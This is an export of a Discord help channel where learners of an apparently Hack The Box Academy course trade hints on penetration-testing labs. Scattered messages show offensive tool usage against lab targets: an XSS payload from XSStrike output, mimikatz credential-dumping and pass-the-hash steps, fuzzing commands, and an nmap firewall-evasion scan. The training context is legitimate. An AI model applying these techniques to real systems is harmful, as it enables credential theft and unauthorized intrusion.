#modules

1 messages · Page 469 of 1

dusk holly
#

powershell has filtering

thin nest
#

but in machine i am at command prompt

dusk holly
thin nest
#

i used it in command prompt like find,findstr,tree

#

in the hint it is also showing tree

dusk holly
thin nest
#

ok

versed swan
#

#cwes I don't know who to contact. The support team sent me here. It's about Skills Assessment - File Inclusion. I use the same payloads, on same endpoint. step by step on solution, but not see the flag.
whats wrong?

fathom pendant
ashen basin
#

Anyone know why academy VPN is acting up? I'm connected all fine and able to ping the machine but my SSH session a lot of the time just comes to a complete freeze and have to fire up another terminal and connect back in.
Killing the VPN and reconnecting works for a little bit but it does it again. This has applied to a lot of the lab machines and becomes quite frustrating. I've tried switching VPN servers but the issue persists

#

It's something that's been bothering me now for like 2-3 months so thought I'd msg here to see if someone has a fix

heady sapphire
#

What is the difference between using MySQL -u username -p —windows-auth vs not using windows-auth?

scenic arrow
#

Hey all! I need some help with the Pass the Certificate module for Password Attacks. What channel would be appropriate?

fathom pendant
heady sapphire
fathom pendant
#

It works on computers that rely on Windows auth mechanisms

scenic arrow
#

Is there a better channel I should ask in? lol

dusk holly
# scenic arrow Is there a better channel I should ask in? lol

this is best channel for asking questions about modules, since you are not getting responses, it is great idea to check older message by searching Password attacks Pass the Certificate or check forums if dicussed, i also saw couple of reddit posts on this section

terse spade
#

I have a problem with this one task:
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.
, How to do it? I already have fie downloaded, and tried isolate it using regex expression, but expression that was working on regex tool didn't work in command, and tools don't offer output, only highlighting, I tried hand picking links, and used couple of methods to filter them out, but nothing gives me correct answer.

earnest pasture
scenic arrow
earnest pasture
past agate
#

Hey everyone got a qeustion about the Cross-Site Scripting (XSS) module, specifically the XSS Discovery,
Im running the same command as in the example and it's not finding any reflection:
python3 xsstrike.py -u "http://94.237.61.249:56154/index.php?task=test"

    XSStrike v3.1.5                                                                                                                                                                      

[~] Checking for DOM vulnerabilities
[+] WAF Status: Offline
[!] Testing parameter: task
[-] No reflection found

Example:
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"

    XSStrike v3.1.4

[~] Checking for DOM vulnerabilities
[+] WAF Status: Offline
[!] Testing parameter: task
[!] Reflections found: 1
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 3072

[+] Payload: <HtMl%09onPoIntERENTER+=+confirm()>
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N]

What am i missing?

past agate
#

cant reach the target, i already tried restarting it and the VPN and nothing changes, any idea what's the problem?

past agate
#

even from the pwn box i can't ping the target....

night shale
#

can someone help me with Password Attacks - Pass the Certificate

What are the contents of flag.txt on jpinkman's desktop?

and

What are the contents of flag.txt on Administrator's desktop?

quasi wave
#

Does anyone know the windows event logs and finding evil module cold? I forgot some of it and decided after my flu dies down I’m gonna redo the module from scratch using the chrome add on that hides flags in hack the box.

#

I will want to redo it sometime this week and really make sure I get it before moving onto the next module but I need someone who knows the module cold in case I get stuck.

#

Is anyone available? Only say yes if you know the subject matter of that one module cold.

#

So that I can ask for help if necessary

#

If I get stuck

#

And make sure I understand it since its a short one but appears important for CDSA

#

Also will learning KQL or taking a KQL course help me with CDSA?

#

I heard knowing KQL is highly beneficial

#

I know KQL is covered in CDSA but will a separate course just on that accelerate my CDSA learning if I do it?

visual pivot
night shale
visual pivot
#

and once i got the ticket i made ||ptt using evil-winrm||

urban forum
#

hello all, in AD Enumeration & Attacks - Skills Assessment Part II Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
is it snaffler? or i should spray ?

leaden star
#

Hello everyone, anyone I can DM for the Advanced XSS and CSRF Exploitation Skills Assessment? Need a nudge if you can for the first portion of the exploit. TIA!

fathom pendant
urban forum
urban forum
scenic ingot
#

Ho, has anyone finished the Wi-Fi Penetration Testing Tools and Techniques: Skills Assessment? Any hints on the last question about connecting to Inlane-Corp and accessing 172.27.0.1 to get the flag? 🥴

fathom pendant
iron yarrow
#

i need help, skills assessment API Attacks

urban forum
night shale
#

can someone help me with Password Attacks - Pass the Certificate

What are the contents of flag.txt on jpinkman's desktop?

and

What are the contents of flag.txt on Administrator's desktop?

urban forum
night shale
urban forum
#

but never ask for flag

night shale
olive fiber
#

Finished the Wifi penetration testing path. Anyone would need anytips/hint let me know

white vale
#

I run into this issue guys. Not sure how, I did the exact thing HTB shows, but it doesn't return that OneDrive password.
there is one command you should try though and is not mentioned (which I think it should be added). That or we all are on a different environment and we must give ourselves admin creds or something like that....

||sekurlsa::cred||

stark egret
#

A

inland shoal
#

anyone finished the AI Red Teamer path fully? I wanna skip the Fundamentals of AI module so badly due to the crazy amounts of theory in it 🤣

#

might just go thru the other modules for the interesting and practical stuff

bright quiver
#

@inland shoal I am working on Attacking AI - Application and System module right now - stuck on the assessment though - i cannot get the flag

#

nvm got the flag - holy hell

night shale
#

can someone help me with Password Attacks - Pass the Certificate

What are the contents of flag.txt on jpinkman's desktop?

and

What are the contents of flag.txt on Administrator's desktop?

I’ve been stuck on this for 9 hours

sterile surge
#

Is it just me, or is the “Skills Assessment - Password Attacks” module packed with concepts that weren’t covered in the “Password Attacks” module? I know a cheatsheet is provided, but the skills and techniques required to complete the assessment are far beyond what is covered, I don't think anyone can complete it without personal research or googling.

I want to think it is by design, or, is it that I just I have not fully grasped the content of the module.

Any thoughts? #modules #general #cpts

wide narwhal
#

Hi there, from Password Attack > Cracking Protected Archives , I'm having an issue when using losetup -f -P Private.vhd with the following error :

losetup: Private.vhd: failed to set up loop device: No such file or directory

I think this is because I'm using Exegol (docker container), however I set this instance with "Privileged: On" so I should be able to do it though, anybody with the same issue ? cheers!

lusty terrace
#

Anyone did the Password Attacks - Network services and its question: " Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." it's taking forever to crack WinRM service :v

#

It's taking quite a long time to crack with netexec any other tools I could use to perhaps fasten the process?

#

nvm Just as I asked the question it returned the result, good thing the combination is more on top and not at the bottom otherwise I'd have to spent a good hour or two just waiting

dusk holly
stone wasp
#

Hi, I am stuck on Q2 of the DACL Attacks II skill assessment. I have 2 possible paths, but am missing one step in each of them. Can I DM someone for a nudge?

wooden ivy
#

Wi-Fi Penetration Testing Tools and Techniques > Skills Assessment (https://academy.hackthebox.com/module/298/section/3962)

I have technical problems with the last task.

DHCP does not work and if I set a static IP I cannot reach the gateway. I restarted the lab multiple times.

Does anyone else have this problem, found a solution or is it just broken?

hollow ermine
#

Hi, if i have gold sub for academy and complete various path during the subscription, after the subscription is expired, i still have the modules unlocked?

inland shoal
acoustic owl
wooden hornet
#

guys i've been stuck in this question since yesterday
i tried running nmap identify the services running on the server then i used msfconsole to search for puplic plugin exploit but every exploit i used will either don't run or i'll get "Exploit completed, but no session was created"
Module: getting started section: public exploits

main epoch
#

guys Ive used gobuster a shit tone of times but it seem to not work...
I am doing Virtual Host and Subdomain Fuzzing and trying to solve the qustion

fathom pendant
fathom pendant
#

Also is inlanefreight.htb in your hosts file?

main epoch
fathom pendant
#

Ah missed it

main epoch
#

afaik i do not need vpn

fathom pendant
#

Try respawning target

main epoch
#

right?

fathom pendant
#

Nope, vpn not required

main epoch
fathom pendant
main epoch
#

yeah i can not think of anything else and do not want to waste more time on it

#

the next qustion works since it is about inlanefreight.com

#

so i think the first one is just broken

wooden hornet
wooden hornet
#

could you give some hints

#

ive been trying for hours now

fathom pendant
#

browser

#

http://ip:port

wooden hornet
wooden hornet
#

ill try this one

wooden hornet
fathom pendant
bright quiver
wooden hornet
fathom pendant
fathom pendant
#

Just the ip or domain

#

Rport is where you specify port (hint. It wont be 22)

#

Filepath-> the path to the file on the remote system, not on your system

wooden hornet
fathom pendant
wooden hornet
wooden hornet
fathom pendant
wooden hornet
fathom pendant
#

Yup

#

When it runs it'll tell you where it saved the file to

wooden hornet
#

thanks for the help ill try it now

#

final question how can i find this file cause i cant find it

#

nvm

#

i forgot that i had to use cat command

fathom pendant
#

not a directory

wooden hornet
#

Thanks for your help throughout the question

fathom pendant
#

np

wooden canopy
#

Hey I'm actually doing the Active Direcotry LDAP module

#

I have a problem with the last question of the Skill Assesment

#

can I get some help ?

cinder tinsel
#

hey guy,

going through windows lateral movement and got stock on winrm third flag to connect do DC01. i been there for over a 1 i cannot find a way around. please, can someone provide any hints? much appreciate it

deep ledge
#

hi im lock on this question from the web fuzing module (What flag do you find when successfully fuzzing the GET parameter?) i tried with this command :wenum -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 -u http://94.237.53.134:38607/get.php?X=FUZZ

zenith schooner
#

anyone on Active directory? I am using inveight to retrieve NTLMv2 (windows version) but I have no results. So, I think I am doing something wrong. I connect via RDP to attacker box. Go to c:\tools and run the tool (powershell). What am I forgetting?

zenith schooner
hidden ledge
#

Should be straigthforward with the command shown in the section

fathom pendant
cinder tinsel
fathom pendant
cinder tinsel
hidden ledge
#

Can't help you then sorry

cinder tinsel
#

thanks tho

zenith schooner
cinder tinsel
mint lodge
#

Hey all, I am on the "Attacking Common Applications" module, section "Attacking Drupal" I am trying to exploit the "Leveraging the PHP Filter Module" to get a shell, but when I came to choose the Text format there was no PHP code option. Is this intended?

zenith schooner
zenith schooner
earnest pasture
mint lodge
#

But the Text formant doesn't have the PHP code option

#

Will do, maybe I'm in the wrong mb

#

Thanks

fathom pendant
#

module is above tier 0; please refrain from sharing direct screenshots from it :)

mint lodge
#

I am currently doing the "Attacking Drupal" exercise, trying to get the flag.
The drupal version is ||7.30|| the PHP filter exists and I gave all users permissions to use it, but I still can't use the PHP code option

mint lodge
mint lodge
fathom pendant
#

because tier 0 modules exist

glacial stratus
fathom pendant
#

and you can still ask and help others without sharing screenshots or things directly from the module

fathom pendant
mint lodge
#

But I will respect that

glacial stratus
mint lodge
fathom pendant
glacial stratus
fathom pendant
#

just because it catches you off guard doesn't mean it isn't a question that people naturally have.

glacial stratus
#

It wasn’t about him. I didn’t mean to make fun of anyone, I just reacted to the question and myself makes a lot of dumb questions

fathom pendant
#

then you can easily use an emoji reaction instead of replying with ... is my point lol

glacial stratus
#

Fair enough

glacial stratus
fathom pendant
#

or sometimes, the best thing to say is nothing at all. You don't need to reply with anything if you have nothing to contribute.

glacial stratus
#

Sure… sorry I didn’t just scroll past.

cinder tinsel
#

anyone that has done windows lateral movement module could help me out please?

gray yacht
deep ledge
cinder tinsel
gray yacht
cinder tinsel
cinder tinsel
gray yacht
cinder tinsel
gray yacht
cinder tinsel
gray yacht
cinder tinsel
#

sounds good. i will try again. literally ,i exchausted my option here. thanks man!

gray yacht
cinder tinsel
past agate
#

Hey i doing a module and got stuck on a hash, i found it try to cut it in different ways (full string, just salt, just hash) and submit it as an answers but it won't accept it as the answer even though it specifically says the user hash password, here is the question:
What is the password hash for the user 'admin'?
what do i need to submit?

past agate
fathom pendant
past agate
#

got it, pasted it, not accepting it

fathom pendant
past agate
#

did that

fathom pendant
#

including the info in the commas

past agate
#

yep the whole string from start to finish

#

with the v,m,t values and the argon

#

Tried it a few more times and it worked on the 3/4 attempt 🤷‍♂️

#

Thanks for the help

crystal prairie
#

Wi-Fi Penetration Testing Basics - last question

Connect to the WiFi network and submit the flag found at IP 192.168.1.1 or 192.168.2.1.

Hi everyone, I’m stuck at the connection stage.
I already captured the handshake, cracked the password (m********), and I have the SSID ***, the BSSID D8:D6:3D:EB:29:D5, and the channel.
I configured the connection using both wpa_supplicant and nmtui/nmcli, but the NetworkManager doesn’t seem to find the HTB network (it only shows another visible SSID, GAMMER‑5G).
I tried all connection methods like GUI, CLI...but nothing working

Any guidance would be appreciated, thanks!

glass talon
#

Hi everyone

I’m currently working through the Penetration Tester job role path. I wanted to ask whether it’s worth repeating the Fundamentals modules multiple times (
Linux Fundamentals, Windows Fundamentals, Introduction to Networking, Introduction to Web Applications, Web Requests, JavaScript Deobfuscation, and Introduction to Active Directory) or if it’s better to continue step by step with the next modules and let my understanding deepen naturally through the labs and hands-on practice.

Thanks for your opinions.

fathom pendant
valid gate
#

I'm currently working on "RDP and SOCKS Tunneling with SocksOverRDP" in the Pivoting, Tunneling, and Port Forwarding section of the CPTS, and I'm having trouble connecting to the 2nd hop.

I ran the SocksOverRDP server file as Admin on the DC/Pivot Host, and in Proxifier I set everything up exactly as the module says. 127.0.0.1 Port 1080 Socks5. When I try to connect, I keep getting this error even after resetting the box multiple times.

#

I did everything exactly as the module says. I even tried using the tips from "BAlkan_BAndit" in the forum post here and it still didn't work. https://forum.hackthebox.com/t/pivoting-tunneling-and-port-forwarding-academy/259382/65?page=4

#

Any tips?

rotund sequoia
#

Password Attacks - Pass The Hash

Stuck at finding David and Julio's hashes. Every time I try to access ||\DC01\david|| from david's account, I get a permission denied, same for Julio. I also set ||LocalAccountTokenFilterPolicy|| to ||0x1|| in the registry for HKLM. Admin CMD with net view doesn't seem to help either. Doing this from RDP btw.

#

Tried going through some previous messages in this discord related to this task, but doesn't seem like anyone else is having this issue.

hidden ledge
#

Maybe you don't have the hash yet ?

#

Idk where you are stuck exactly

stark hedge
#

Module: AD Trust Attacks
Section: Skills Assessment

Could someone help me with Q1?

silk lagoon
mighty matrix
valid gate
mighty matrix
valid gate
silk lagoon
valid gate
#

even made sure I used the 172.15.6 subnet instead of 172.15.5

rotund sequoia
# hidden ledge Maybe you don't have the hash yet ?

Already || dumped the SAM from the admin account. || Got David's hash and || used it to RDP ||, then I tried to use file explorer to access share, but access denied, same with PowerShell/CMD. I haven't tried mimi yet, will try it.

stray remnant
#

i've set breakpoints to get the value of rax throughout the program but i can't get the correct answer, any debuggers that can help?

#

from Intro to Assembly > Debugging with GDB

green cypress
#

Anyone know if the list_methods.js script in the Android Application Dynamic Analysis (Altering Method Values) works as it just prints [*] Class enumeration complete as soon as the Android app opens

quasi wave
#

Why does no one ever want to help me with modules when I ask?

#

Supplements probably weren’t helping by the way but I think I got a test that showed another medical condition and after I correct that I think hack the box will be doable. Good news is it’s probably a one month thing and not any more than that so I know it will probably work.

#

But I feel like when I ask for help I get ignored.

#

Like with a module

cloud urchin
#

I've seen people help you so that's not true at all. My guess would be when you ask no one who is paying attention to the channel has done the module and they don't know themselves. Plus not everyone helps people.

quasi wave
#

Ok sorry

#

I didn’t mean to sound whiny

#

Anyway I am trying a new medical treatment starting tomorrow and when I know if its effective I’m gonna try CDSA again

#

I think my snails pace at HTB is related to my medical issue but now I think unlike the supplements this new treatment will probably work

#

I think someone who actually can do htb wouldn’t have thyroid issues

#

That’s the main thing here

#

But I’m fixing that and in a month I’ll try HTB CDSA again

#

actually that’s probably my issue this whole time

mighty matrix
mighty matrix
quasi wave
deep ledge
#

hi im lock on this question from the web fuzing module (What flag do you find when successfully fuzzing the GET parameter?) i tried with this command :wenum -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 -u http://94.237.53.134:38607/get.php?X=FUZZ

bitter sequoia
#

I'm currently working on Attacking WPA3 Wi-Fi Networks - OWE Evil Twin Attack and getting the following errors:

  • invalid key_mgmt `OWE
  • WPA-PSK enabled, but PSK or passphrase is not configured
    Is anyone available for help?
cyan veldt
#

can u link it?

flint palm
#

guys only I have problems with targets or it is a problem now?

#

they are spawning all the time

tight copper
#

On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive)

#

@dusk holly if you can help me

mint lodge
#

Are you batman?

dusk holly
tight copper
tight copper
dusk holly
tight copper
#

but when i type it and presse enter its say its not good ?

dusk holly
tight copper
#

ahhhh

#

dawn okay

tight copper
dusk holly
#

also don't forget to delete

tight copper
dusk holly
tight copper
tight copper
#

if i get the CPTS do i get this role after ?

dusk holly
#

preparing for it

tight copper
dusk holly
#

wby

tight copper
dusk holly
tight copper
ivory tide
#

Hi all, Im stuck at HTTP Misconfigurations - Skills Assessment - Hard, would like to ask if there are any hints and can anyone point me at the right direction?
I can't seem to find an unkeyed parameter.... I do know that its vulnerable to parameter cloaking due to it using python bottle. But that's about it ):

calm swallow
#

hi guys ah do i have to submit the answer in flag format like htb{....}? cuz i tried to submit the version only but it didnt work

kindred viper
calm swallow
dusk rover
#

did u include the service name as well

calm swallow
#

yes -sV

dusk rover
#

i mean in the answer

calm swallow
#

yeh i did but nope. ill try again to be sure.

dusk rover
#

okay, good luck

rocky vigil
#

hello guys I have a problem to setup the env for module /170/section/1674 SAML env I add the hosts to /etc/hosts but I can't reach out to them anyone faced this before

calm swallow
#

did but no still

#

that "submit the flag" in question i suspect u have to submit answer in flag forma htb{..} maybe?

dusk rover
#

generally no need for htb{}

#

unless the answer has it (e.g. task is reading from a file and its content is in htb{.+})

calm swallow
#

i see i tried the most of the scan. tried to submit the version in different format but still no so shd i try scan other ports then?

dusk rover
#

did u include whatever inside the parentheses or no?

#

and u shouldnt change the format, just copy-paste the value in version column should work

calm swallow
#

i did

#

ah yes yess

#

got it

calm swallow
#

i have done service version nmap run but i didnt find any flag in flag format

#

ah to dm it say u have to add me friend

#

WAIT 1min

sour vapor
#

Hi, can someone help me with Q2 of DACL 2 SA?

gray yacht
zenith schooner
rocky vigil
#

hello guys I have a problem to setup the env for module /170/section/1674 SAML env I add the hosts to /etc/hosts but I can't reach out to them anyone faced this before

woeful ermine
#

Hi there can someone help me with File Upload Attacks module Filter types section I got the file upload successfully response but when i got to the corresponding url to get the flag i get URL Not found any idea?

fallen zodiac
#

Anyone else getting issues with rdp connection in Windows Fundamentals module ? i cant connect with the VPN or the pwnbox

flint palm
#

Hello Guys has anyone completed Hacking Wordpress module?

cloud urchin
#

Lots of people have

rotund sequoia
# rotund sequoia Already || dumped the SAM from the admin account. || Got David's hash and || use...

Password Attacks -> Pass the Hash
Ok so I figured it out, I'm gonna just leave a message in case some else has this same issue || I had to RDP pth as david, the open an admin CMD, then use mimikatz pth to david (david -> david, not sure why?). Then type dir \\DC01\david\david.txt and I got the flag||. Not sure if it's me fumbling the bag on my end or a bug, but if I || RDP pth in as Admin, and do mimikatz pth to david, or do any pth technique with david's hash, I'll log in as inlanefreight\david, but I just won't be able to access that share, so I had to do another pth with mimikatz||.

warm horizon
#

Good evening my friends, sorry to bother you, but I wanted to ask a question. If any of you have already worked on this module, I would appreciate any advice, as I've tried several payloads all day today to get the answers and haven't succeeded. If any of you could give me just a hint of what to execute, I would be grateful. Thank you and have a great night. This is the SQLINJECTIONFUNDAMENTALS module. This is the question: What is the password hash for the user 'admin'? (last page of the module). Sorry for not speaking very well, as I am Brazilian.

tacit vigil
#

God, thank you, no wonder why my exploit never triggered admin

glossy horizon
#

Hello there! I'm a little stuck with the end of the module Incident Handling Process > Skills Assessment. I'm not able to get the information that i need to answer the questions. Can somebody help me?

west yacht
cloud urchin
#

@west yacht Please take care not to post content from modules above tier 0. Especially skill assessments, your picture contained spoilers.

fathom pendant
# west yacht

Are you connected to the vpn and is that the target ip?

bitter sequoia
#

Windows Lateral Movement - Skill assessment - Q2 - What's the content of the flag located at C:\Users\Arturo\Desktop\flag.txt ? I have a session as arturo. However, there is nothing on his desktop. Is anyone available for a hint?

white vale
#

I can't spawn a target in the module/147/section/1657

#

any help please? I just keeps looping at Target(s) are spawning...

cloud urchin
white vale
#

I'll wait then!

cloud urchin
#

if that doesn't work you can reach out to support but if it's really stuck it should time out after a bit

stray remnant
#

anyone debuggers in the house or have recently done the Intro to Assembly module? i'm stuck figurging something out using gdb

bitter sequoia
cloud urchin
#

the flag should be there

bitter sequoia
cloud urchin
#

yeah

vast cairn
#

Hey all, I'm trying to do the WPS Module, and I've gotten to the point where I"m trying to use wpspin, but that git repository no longer exists.

cloud urchin
#

I haven't done that, but if you can't get the tool on your VM it should be on the pwnbox

#

i believe they have the tools in /opt

#

wait don't those force you to use an attacker box?

#

yeah look in there it's probably already there

vast cairn
#

oh duhhh of course I"m using the rdp stuff

stray remnant
#

the task is to: "+ 1 Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?" so that should be setting a breakpoint in gdb with: "break *_start+16" or "break *_start+16" but when i then run the program neither value of rax is the correct answer

vast cairn
#

thanks I was having a moment

stray remnant
#

womp womp

bitter sequoia
#

Is anyone available for a DM to help with the Attacking WPA3 Networks Evil Twin Attack questions?

little terrace
#

ls E:\

tall pike
#

hello!
i am currently in "PASSWORD ATTACKS" module
and "Spraying, Stuffing, and Defaults" section
question is "Use the credentials provided to log into the target machine and retrieve the MySQL credentials. Submit them as the answer. (Format: <username>:<password>) "
I've got 100 credential lines from MySQL — any hint which one is the right cred for answer?

lusty terrace
tall pike
#

i am thinking to go for brute force but it's lazy option

#

asking for if there is something else i should do it

lusty terrace
#

they want you to the submit the MYSQL credentials not the username and password in the tables (IIRC)

tall pike
#

bruh

#

i tried that, i really tried that and it didn't work that time (probably forget to add a letter...) now it worked; thanks

lusty terrace
#

I am in Password attacks module on attacking AD and ndts.dit module doing the Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive) I compiled a list of names of the potential targets (3 people) and enumerate valid users with Kerbrute but i'm getting "2026/01/15 01:46:36 > [!] marston.john@inlanefreight.local - KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting..." for each users (21 variations) hmm I do see the usernames that the hint provided (InitialLastName)

signal chasm
#

I am doing intro so bash scripting, module conditional execution. The task was to count the characters of the base64 encoded variable, which was encoded 40 times and I needed to count the variables after 35 times. So... I got the answer after checking the soltions, but it is not clear why. To count the characters inside the variable, I used "length". However, the solution used "wc -m". Why should I haven known, that i needed to use wc -m instead of length? I have a coding background (mainly C), but no bash scripting experience

lusty terrace
fathom pendant
#

my best guess is there's a different word instead of task

#

haven't done that module though

versed swan
#

#cwes There is a Skills Assessment – File Inclusion. Did you have any issues exploiting the RCE?

fathom pendant
fathom pendant
#

but you can dm me, it's a simple error - but if you don't wanna DM; look at the apply form 😉

fathom pendant
left frigate
#

Command injection - Bypassing Other Blacklisted Characters. Can I get some assitance on this end of task question?

rocky jasper
#

Getting started | Module Service Scanning | Section 7.
May someone please tell me what I'm doing wrong? 🙂

ocean night
#

We already did, you haven't changed it

#

But as you probably won't read that, as we already said remove /index.php. The hosts file is an override for DNS lookups. You provide it with an IP address, and one or more hostnames which will take precedent for any DNS lookup and resolve to the IP stated in the hosts file.

fathom pendant
#

it looks like adding an entry into the hosts file isn't required

left frigate
#

something wrong with that lab

fathom pendant
ocean night
#

Indeed

fathom pendant
#

so editing the hosts file is a moot point

fathom pendant
strange aspen
#

hi guys can someone help me with
Cross-Site Scripting (XSS) Phishing? I have a solution that is technically working but i still get the message issue with website i wrote the support because its not my fault but they didnt want to help me...

spiral yarrow
#

can any one support me in this module Bypassing Wi-Fi Captive Portals

nocturne edge
#

NEED HELP: I am working on the CJCA path as a beginner I am learning a lot, but I am on the intro to networking module right before linux basics. I am just not really retaining any of this its just a lot of text with things I dont understand. Will it all clear up and get used again later or do I need to understand this all now?

weak knoll
harsh basin
#

Hey everyone, do you think HTB will drop a new Purple Teamer certification in 2026? If so, what do you think the focus will be? Maybe adversary emulation and detection engineering?

iron cipher
#

Hello everyone, i am on the last question of DACL I skill assessment and it is saying to read the Flag on the admin desktop, i found and i got to José and i saw that has writedacl rights a specific group and that group had read gmsa password. Every time i try to read the gmsa password and i use José ntlm hash it says the credentials invalid when they are not an i tried using netexec to read the gmsa Ntlm for the svc account but still no dice i had jose own the group that has the rights to the GMSA password reader edge. Can someone tell what i am doing wrong in a dm.

vital zodiac
#

I've simple question, if I subscribed the silver annual billing, can I see the step-by-step module solutions of CWEE modules? (After purchasing the cubes of this module)

fathom pendant
#

yes

#

you'll likely need to enable it in your settings

deep ledge
#

hello i tri to fuzz for the vhosts i trie with this command gobuster vhost -u http://inlanefreight.htb:4240/ -w /home/guillaume/tools/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain i tried with the common.txt wordlist too and the other open port its (virtual hosts and subdomain fuzing module )

gray yacht
strange aspen
vagrant pine
#

I’m in the pivoting tunneling and port forwarding module and two of the tools introduced, rpivot and dnscat2 are either a pain to install because they require older python libraries or they are not supported on Apple silicon. Could I use ligolo in place of rpivot and iodine in place of dnscat2? Or will the exam specifically require rpivot and dnscat 2?

ocean night
#

You could use virtualenv to setup the appropriate environment in isolation

vagrant pine
#

I understand that the tools could be installed in a virtual environment but my question is whether we are limited to only using those tools or could use ligolo and iodine instead for the course and exam.

ocean night
#

If they achieve the same goal, then I don't see why not

clear jungle
#

https://academy.hackthebox.com/module/167/section/1636

Module: IntroToWindowsCommandLine

Section: AllAboutCMDletsAndModules

Having issues with the last question, which is to practice installing and loading modules on the target.

Find-Module returns nothing, so I tried formatting it with Find-Module | Format-Table, nothing.

I verified it exists with Get-Module PowerShellGet

I further verified with PowerShellGet -ListAvailable

PS C:\Users\htb-student> Get-PSRepository
WARNING: Unable to find module repositories.

Register-PSRepository, following the steps, gives an error to add the -Default option, but doing that returns nothing and doesn't fix the issue.

I'm guessing I'm missing something since when I tab auto-complete it corrects to PSRepository, as if it already exists? Or is this somekind of issue being on powershell 5.1? Or am I just taking the task too literally...

EDIT: I'm using pwnbox.
Bonus question: Why do some powershell options become invisible as I type them? Is this some kind of weird issue with psreadline?

mighty matrix
#

Im using pwnbox because i was getting the same issue on my kali but its still not working. Does anyone know why and what the issue could be?

ocean night
mighty matrix
#

I changd the IP (reset) too it asked for certificate again and same issue

ocean night
#

Also good to mention which Module and Section you are working on

mighty matrix
#

I tried this

ocean night
#

Ok

#

Look at the command very carefully under Practical Exercises

#

There's something different in your command

#

This is above Tier 0 mind, so I can't say much else tbh

mighty matrix
ocean night
#

The password is fine.

mighty matrix
#

get this error 😅

#

ok let me have another look

ocean night
#

It's something else near by

#

Yeah do, there's something obviously different, but easy to miss, and that error is a big clue.

#

Going to bed, you got this

#

nn.. again 🙂

mighty matrix
#

and thanks for pointing it out, im tryna have a look now 😅

mighty matrix
vast cairn
#

Are there any clues I can get for the WPS skills assessment? I've so far tried all the strategies I can from the module, but none of it seems to work, unless I want to let the bruteforcing go for more than 10 minutes or something.

strange aspen
#

hi guys can someone help me with
Cross-Site Scripting (XSS) Phishing? I have a solution that is technically working but i still get the message issue with website i wrote the support because its not my fault but they didnt want to help me...

ocean night
#

Oh.. was looking at the wrong answer 😅

#

I can't help directly with content I'm afraid, but hopefully someone will be able to help you out with a nudge

mighty matrix
#

tried refreshing the page multiple times but nothing 🙁 anyone else experiencing similar issues?

uncut turtle
mighty matrix
uncut turtle
#

i tried using a different vpn, tried signing out, tried using a different browser. nothing

mighty matrix
#

hella annoying tho.

mighty matrix
#

wait mine just loaded

#

maybe try refreshing your page?

uncut turtle
#

i think their services are down but i check the status page and it says everything is "operational"

#

fr mine loaded too

mighty matrix
#

lool hella weird

uncut turtle
#

no kidding lol

mighty matrix
#

wht module u doin?

uncut turtle
#

network foundations

#

been meaning to finish this one for months now but i kept skipping it and moving to a different one

mighty matrix
#

ahh I see, which path is that? I think I remember doing that but it was earlier on

uncut turtle
#

cybersecurity analyst. I took a break from the the penetration tester path cause the password attack module took me such a long time to finish and it was mentally draining.

mighty matrix
uncut turtle
#

im doing the cybersecurity analyst now hoping i can start cybersecurity this year.

mighty matrix
uncut turtle
versed swan
#

did you solve it? the same trouble

rustic sage
versed swan
rustic sage
#

Wait I can't answer now

lusty terrace
#

for Password Attacks - Credentials huniting in Network Shares's password is a pain in the a would You be expected to do this long and tedius of reading most passwords and trying credentials in the CPTS

dark jay
#

can anyone help me with API Attacks Broken Object Property Level Authorization Second question? i saw the hint and i dont get where should i get the ID to type on this endpoint api/v1/customers/orders/items

hasty mauve
#

Module: Introduction to Windows Evasion Techniques
Section: Static Analysis

I created the malware and copied it to C:\Alpha\Static as per the instructions, the log.txt shows it evaded detecion, yet there's no flag.txt file being created.

#

I reset the lab and it's still the same

rain snow
clear jungle
dark jay
coarse pine
cyan veldt
#

I can help

rustic sage
#

Sorry

#

Now I can

cyan veldt
rustic sage
#

DM me

dark jay
dusk rover
#

in file inclusions module, everytime i try to send the payload on spawned machine i always get this error (tried other browser and even via terminal too), but i can access it via curl in wsl, anyone knows why?

gray yacht
austere grail
#

While writing notes, how long does a module usually take you? Because while yes writing notes helps me retain more information in the long run, it makes it soooo much longer to finish a module (requiring several days for each one)

#

is that normal?

waxen totem
#

the estimated module time is to be taken with a grain of salt

storm elk
#

but yeah, some modules will be faster than the time shown, some slower. Everyone learns at their own pace 💚

#

its not the speed that matters, but how much info you retain

untold rose
#

Hello, i'm stuck on Firewall and IDS/IPS Evasion - Hard Lab in module Network Enumeration with NMAP
This is the question

Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
I've found the ports ||22,80,and_some||, and the 3rd port running|| ib<snip>b2||.
I can't get the version in any way.
The command im running ||sudo nmap 10.129.72.163 -p<pott> -Pn -n --disable-arp-ping --source-port 53 -v -T2 -sV || Please give me a hint.

fair thunder
#

Module Active Directory BloodHound - SharpHound - Data Collection from Windows
Lab Machine not spawn

untold rose
minor bear
#

I am currently in the Password Attacks module working on the AD and NTDS, but I can't get Kerbrute to read the useernames file that I created from Username Anarchy.
I imagine it's something simple that I'm missing on this, since I can't find anyone else dealing with this, but can someone idiot check this? I've checked my syntax against the lesson, and the step by step solution, but I'm not able to see where I'm going wrong. I even changed my file name from "username.list" to "username.txt" to see if that was the problem, tried putting the file path to the file to see if that might've been the problem (file is in the same folder as Kerbrute, which is where I am)

fossil jacinth
#

Don't you need to specify what type of an attack you are performing ? the "userenum" more specifically @minor bear

minor bear
#

Yep, that was it. I knew it was something simple that I was missing.

dull burrow
#

